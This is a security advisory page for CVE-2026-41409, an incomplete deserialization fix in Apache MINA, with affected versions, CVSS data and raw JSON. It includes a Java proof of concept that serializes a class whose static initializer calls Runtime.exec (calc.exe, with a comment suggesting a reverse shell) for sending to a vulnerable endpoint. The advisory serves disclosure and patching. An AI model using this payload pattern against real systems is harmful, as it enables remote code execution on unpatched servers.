Security Vulnerability Report
CVE-2026-41409 CVSS 9.8 CRITICAL

Published: 2026-04-27 10:16:10
Last Modified: 2026-04-29 19:08:07

Description

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete: the classname allowlist of classes allowed to be deserialized was applied too late, after a static initializer of the class being read might already have been executed. Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE (Apache MINA 2.0.0 <= 2.0.27; fixed in 2.0.28)
cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE (Apache MINA 2.1.0 <= 2.1.10; fixed in 2.1.11)
cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:* - VULNERABLE (Apache MINA 2.2.0 <= 2.2.5; fixed in 2.2.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```java
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// A class whose static initializer runs as soon as the JVM loads it.
// In the vulnerable getObject() the classname allowlist was applied only
// after the class had already been resolved, so this block could run on the
// target before the allowlist rejected the class. The JVM can only load the
// class if it is already present on the target's classpath.
class EvilPayload implements Serializable {
    private static final long serialVersionUID = 1L;

    static {
        try {
            // Malicious action: e.g., open calculator or reverse shell
            Runtime.getRuntime().exec("calc.exe");
            System.out.println("Malicious code executed in static block!");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

public class CVE202641409POC {
    public static void main(String[] args) throws Exception {
        // Serialize the malicious object. Note that instantiating EvilPayload
        // here also triggers its static initializer on the local JVM.
        EvilPayload evil = new EvilPayload();
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(evil);
        }
        byte[] payload = bos.toByteArray();

        // Output the serialized bytes (hex or base64) to send to the vulnerable server
        System.out.println("Generated Payload Length: " + payload.length);
        // In a real attack, send this byte array to the vulnerable Apache MINA endpoint
    }
}
```

References

https://lists.apache.org/thread/9ddvsq6c4l5bhwq8l14sob4f8qjvx5c9 (Mailing List, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41409", "sourceIdentifier": "[email protected]", "published": "2026-04-27T10:16:09.740", "lastModified": "2026-04-29T19:08:07.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed.\n\n\n\n\nAffected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5.\n\n\n\n\nThe problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by \napplying the classname allowlist earlier.\n\n\n\n\nAffected are applications using Apache MINA that call IoBuffer.getObject().\n\n\n\n\nApplications using Apache MINA are advised to upgrade"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.28", "matchCriteriaId": "BD2A5F4E-7B53-4235-BE01-DD9B9E3614E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.11", "matchCriteriaId": "E69C9219-F00B-4677-88B8-3263615586BD"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:apache:mina:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2.0", "versionEndExcluding": "2.2.6", "matchCriteriaId": "EC86281C-5EBB-4250-8575-50EB77E76F3E"}]}]}], "references": [{"url": "https://lists.apache.org/thread/9ddvsq6c4l5bhwq8l14sob4f8qjvx5c9", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}]}}